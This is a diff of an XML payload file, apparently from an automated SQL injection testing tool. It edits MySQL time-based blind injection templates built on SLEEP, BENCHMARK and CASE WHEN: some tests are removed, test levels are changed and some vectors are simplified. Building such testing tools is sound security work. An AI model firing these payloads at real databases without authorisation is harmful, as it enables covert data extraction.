|
2 | 2 |
|
3 | 3 | <root> |
4 | 4 | <!-- Time-based boolean tests --> |
5 | | - <test> |
6 | | - <title>MySQL >= 5.0.12 AND time-based blind (SLEEP)</title> |
7 | | - <stype>5</stype> |
8 | | - <level>1</level> |
9 | | - <risk>1</risk> |
10 | | - <clause>1,2,3,9</clause> |
11 | | - <where>1</where> |
12 | | - <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> |
13 | | - <request> |
14 | | - <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> |
15 | | - </request> |
16 | | - <response> |
17 | | - <time>[SLEEPTIME]</time> |
18 | | - </response> |
19 | | - <details> |
20 | | - <dbms>MySQL</dbms> |
21 | | - <dbms_version>>= 5.0.12</dbms_version> |
22 | | - </details> |
23 | | - </test> |
24 | | - |
25 | | - <test> |
26 | | - <title>MySQL >= 5.0.12 OR time-based blind (SLEEP)</title> |
27 | | - <stype>5</stype> |
28 | | - <level>1</level> |
29 | | - <risk>3</risk> |
30 | | - <clause>1,2,3,9</clause> |
31 | | - <where>1</where> |
32 | | - <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> |
33 | | - <request> |
34 | | - <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> |
35 | | - </request> |
36 | | - <response> |
37 | | - <time>[SLEEPTIME]</time> |
38 | | - </response> |
39 | | - <details> |
40 | | - <dbms>MySQL</dbms> |
41 | | - <dbms_version>>= 5.0.12</dbms_version> |
42 | | - </details> |
43 | | - </test> |
44 | | - |
45 | | - <test> |
46 | | - <title>MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)</title> |
47 | | - <stype>5</stype> |
48 | | - <level>3</level> |
49 | | - <risk>1</risk> |
50 | | - <clause>1,2,3,9</clause> |
51 | | - <where>1</where> |
52 | | - <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> |
53 | | - <request> |
54 | | - <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> |
55 | | - <comment>#</comment> |
56 | | - </request> |
57 | | - <response> |
58 | | - <time>[SLEEPTIME]</time> |
59 | | - </response> |
60 | | - <details> |
61 | | - <dbms>MySQL</dbms> |
62 | | - <dbms_version>>= 5.0.12</dbms_version> |
63 | | - </details> |
64 | | - </test> |
65 | | - |
66 | | - <test> |
67 | | - <title>MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)</title> |
68 | | - <stype>5</stype> |
69 | | - <level>3</level> |
70 | | - <risk>3</risk> |
71 | | - <clause>1,2,3,9</clause> |
72 | | - <where>1</where> |
73 | | - <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> |
74 | | - <request> |
75 | | - <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> |
76 | | - <comment>#</comment> |
77 | | - </request> |
78 | | - <response> |
79 | | - <time>[SLEEPTIME]</time> |
80 | | - </response> |
81 | | - <details> |
82 | | - <dbms>MySQL</dbms> |
83 | | - <dbms_version>>= 5.0.12</dbms_version> |
84 | | - </details> |
85 | | - </test> |
86 | | - |
87 | 5 | <test> |
88 | 6 | <title>MySQL >= 5.0.12 AND time-based blind</title> |
89 | 7 | <stype>5</stype> |
90 | | - <level>2</level> |
| 8 | + <level>1</level> |
91 | 9 | <risk>1</risk> |
92 | 10 | <clause>1,2,3,9</clause> |
93 | 11 | <where>1</where> |
|
107 | 25 | <test> |
108 | 26 | <title>MySQL >= 5.0.12 OR time-based blind</title> |
109 | 27 | <stype>5</stype> |
110 | | - <level>2</level> |
| 28 | + <level>1</level> |
111 | 29 | <risk>3</risk> |
112 | 30 | <clause>1,2,3,9</clause> |
113 | 31 | <where>1</where> |
|
127 | 45 | <test> |
128 | 46 | <title>MySQL >= 5.0.12 AND time-based blind (comment)</title> |
129 | 47 | <stype>5</stype> |
130 | | - <level>4</level> |
| 48 | + <level>3</level> |
131 | 49 | <risk>1</risk> |
132 | 50 | <clause>1,2,3,9</clause> |
133 | 51 | <where>1</where> |
|
148 | 66 | <test> |
149 | 67 | <title>MySQL >= 5.0.12 OR time-based blind (comment)</title> |
150 | 68 | <stype>5</stype> |
151 | | - <level>4</level> |
| 69 | + <level>3</level> |
152 | 70 | <risk>3</risk> |
153 | 71 | <clause>1,2,3,9</clause> |
154 | 72 | <where>1</where> |
|
248 | 166 | </details> |
249 | 167 | </test> |
250 | 168 |
|
251 | | - <test> |
252 | | - <title>MySQL >= 5.0.12 RLIKE time-based blind (SLEEP)</title> |
253 | | - <stype>5</stype> |
254 | | - <level>2</level> |
255 | | - <risk>1</risk> |
256 | | - <clause>1,2,3,9</clause> |
257 | | - <where>1</where> |
258 | | - <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> |
259 | | - <request> |
260 | | - <payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> |
261 | | - </request> |
262 | | - <response> |
263 | | - <time>[SLEEPTIME]</time> |
264 | | - </response> |
265 | | - <details> |
266 | | - <dbms>MySQL</dbms> |
267 | | - <dbms_version>>= 5.0.12</dbms_version> |
268 | | - </details> |
269 | | - </test> |
270 | | - |
271 | | - <test> |
272 | | - <title>MySQL >= 5.0.12 RLIKE time-based blind (SLEEP - comment)</title> |
273 | | - <stype>5</stype> |
274 | | - <level>4</level> |
275 | | - <risk>1</risk> |
276 | | - <clause>1,2,3,9</clause> |
277 | | - <where>1</where> |
278 | | - <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> |
279 | | - <request> |
280 | | - <payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload> |
281 | | - <comment>#</comment> |
282 | | - </request> |
283 | | - <response> |
284 | | - <time>[SLEEPTIME]</time> |
285 | | - </response> |
286 | | - <details> |
287 | | - <dbms>MySQL</dbms> |
288 | | - <dbms_version>>= 5.0.12</dbms_version> |
289 | | - </details> |
290 | | - </test> |
291 | | - |
292 | 169 | <test> |
293 | 170 | <title>MySQL >= 5.0.12 RLIKE time-based blind</title> |
294 | 171 | <stype>5</stype> |
295 | | - <level>5</level> |
| 172 | + <level>2</level> |
296 | 173 | <risk>1</risk> |
297 | 174 | <clause>1,2,3,9</clause> |
298 | 175 | <where>1</where> |
|
312 | 189 | <test> |
313 | 190 | <title>MySQL >= 5.0.12 RLIKE time-based blind (comment)</title> |
314 | 191 | <stype>5</stype> |
315 | | - <level>5</level> |
| 192 | + <level>4</level> |
316 | 193 | <risk>1</risk> |
317 | 194 | <clause>1,2,3,9</clause> |
318 | 195 | <where>1</where> |
|
1392 | 1269 | <risk>1</risk> |
1393 | 1270 | <clause>1,2,3,9</clause> |
1394 | 1271 | <where>3</where> |
1395 | | - <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector> |
| 1272 | + <vector>(CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)</vector> |
1396 | 1273 | <request> |
1397 | | - <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload> |
| 1274 | + <payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)</payload> |
1398 | 1275 | </request> |
1399 | 1276 | <response> |
1400 | 1277 | <time>[SLEEPTIME]</time> |
|
1406 | 1283 | </test> |
1407 | 1284 |
|
1408 | 1285 | <test> |
1409 | | - <title>MySQL >= 5.0.12 time-based blind - Parameter replace (SLEEP)</title> |
| 1286 | + <title>MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)</title> |
1410 | 1287 | <stype>5</stype> |
1411 | 1288 | <level>3</level> |
1412 | 1289 | <risk>1</risk> |
|
1432 | 1309 | <risk>2</risk> |
1433 | 1310 | <clause>1,2,3,9</clause> |
1434 | 1311 | <where>3</where> |
1435 | | - <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector> |
| 1312 | + <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM])</vector> |
1436 | 1313 | <request> |
1437 | | - <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload> |
| 1314 | + <payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM])</payload> |
1438 | 1315 | </request> |
1439 | 1316 | <response> |
1440 | 1317 | <time>[DELAYED]</time> |
|
1769 | 1646 | <risk>1</risk> |
1770 | 1647 | <clause>2,3</clause> |
1771 | 1648 | <where>1</where> |
1772 | | - <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector> |
| 1649 | + <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END))</vector> |
1773 | 1650 | <request> |
1774 | | - <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload> |
| 1651 | + <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END))</payload> |
1775 | 1652 | </request> |
1776 | 1653 | <response> |
1777 | 1654 | <time>[SLEEPTIME]</time> |
|
0 commit comments